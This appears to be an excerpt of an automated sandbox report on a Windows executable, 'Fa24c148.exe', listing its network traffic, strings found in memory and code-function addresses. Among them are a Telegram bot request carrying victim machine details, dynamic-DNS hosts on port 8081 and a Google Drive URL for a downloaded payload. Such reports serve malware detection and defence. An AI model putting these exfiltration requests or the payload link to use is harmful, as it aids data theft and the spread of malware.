            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2028/10/2024%20/%2022:44:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 28 Oct 2024 11:22:50 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Fa24c148.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20a
            Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Fa24c148.exe, 00000004.00000002.2951440746.0000000033782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003377D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/o
            Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930879164.00000000049C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6
            Source: Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download
            Source: Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloadal
            Source: Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloadle
            Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003360D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003360D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.0000000033637000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188$
            Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Fa24c148.exe, 00000004.00000002.2952797218.0000000034699000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.00000000346E7000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034940000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003483D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003470E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Fa24c148.exe, 00000004.00000002.2952797218.00000000346E9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034674000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003469F000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034843000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034818000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003491B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Fa24c148.exe, 00000004.00000002.2952797218.0000000034699000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.00000000346E7000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034940000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003483D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003470E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Fa24c148.exe, 00000004.00000002.2952797218.00000000346E9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034674000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003469F000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034843000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034818000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003491B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000337B3000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000337A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000337AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_00405160 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405160
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_004031FF
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,4_2_004031FF
            Source: C:\Users\user\Desktop\Fa24c148.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_004063CC0_2_004063CC
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_0040499D0_2_0040499D
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_004063CC4_2_004063CC
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0040499D4_2_0040499D
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016A0884_2_0016A088
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016C1474_2_0016C147
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016D2784_2_0016D278
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_001653624_2_00165362
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016C4684_2_0016C468
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_001664984_2_00166498
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016D5484_2_0016D548
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_001676F14_2_001676F1
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016C7384_2_0016C738
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016E9884_2_0016E988
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016CA084_2_0016CA08
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016CCD84_2_0016CCD8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016CFAA4_2_0016CFAA
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_00166FC84_2_00166FC8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016E97A4_2_0016E97A
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_0016F9614_2_0016F961
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_00163E094_2_00163E09
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_357829684_2_35782968
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_357895484_2_35789548
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578FC684_2_3578FC68
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_357850284_2_35785028
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_357817A04_2_357817A0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578DE004_2_3578DE00
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35781E804_2_35781E80
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578D5504_2_3578D550
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578D5404_2_3578D540
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578DDF14_2_3578DDF1
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578D9A84_2_3578D9A8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578D9994_2_3578D999
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_357800404_2_35780040
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578003F4_2_3578003F
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35789C184_2_35789C18
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_357850184_2_35785018
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578001B4_2_3578001B
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578F8104_2_3578F810
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578F8034_2_3578F803
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578D0F84_2_3578D0F8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578CCA04_2_3578CCA0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578EF604_2_3578EF60
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578EF514_2_3578EF51
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35780B304_2_35780B30
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35780B204_2_35780B20
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578EB084_2_3578EB08
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578F3B84_2_3578F3B8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578F3A84_2_3578F3A8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35788BA04_2_35788BA0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578178F4_2_3578178F
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35781E704_2_35781E70
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578E2584_2_3578E258
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578E24B4_2_3578E24B
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578EAF84_2_3578EAF8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578E6B04_2_3578E6B0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578E6AF4_2_3578E6AF
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_3578E6A04_2_3578E6A0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E681D04_2_35E681D0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E68FB04_2_35E68FB0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E67B784_2_35E67B78
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6C9E84_2_35E6C9E8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E615E84_2_35E615E8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E615F84_2_35E615F8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E62FF94_2_35E62FF9
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6E9C84_2_35E6E9C8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6E9D84_2_35E6E9D8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E65BD84_2_35E65BD8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6C9D84_2_35E6C9D8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E611A04_2_35E611A0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E62BA04_2_35E62BA0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E68FA14_2_35E68FA1
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E62BAF4_2_35E62BAF
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6B7A84_2_35E6B7A8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E62BB04_2_35E62BB0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6D7874_2_35E6D787
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E657804_2_35E65780
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6F7884_2_35E6F788
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6D7984_2_35E6D798
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6B7984_2_35E6B798
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E67B694_2_35E67B69
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E67B774_2_35E67B77
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E657704_2_35E65770
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6F7784_2_35E6F778
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E60D484_2_35E60D48
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6E5484_2_35E6E548
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6C5484_2_35E6C548
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E627494_2_35E62749
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6C5584_2_35E6C558
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E627584_2_35E62758
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E677204_2_35E67720
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E653284_2_35E65328
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6A9284_2_35E6A928
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6A9384_2_35E6A938
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6E5384_2_35E6E538
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E6B3074_2_35E6B307
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E623004_2_35E62300
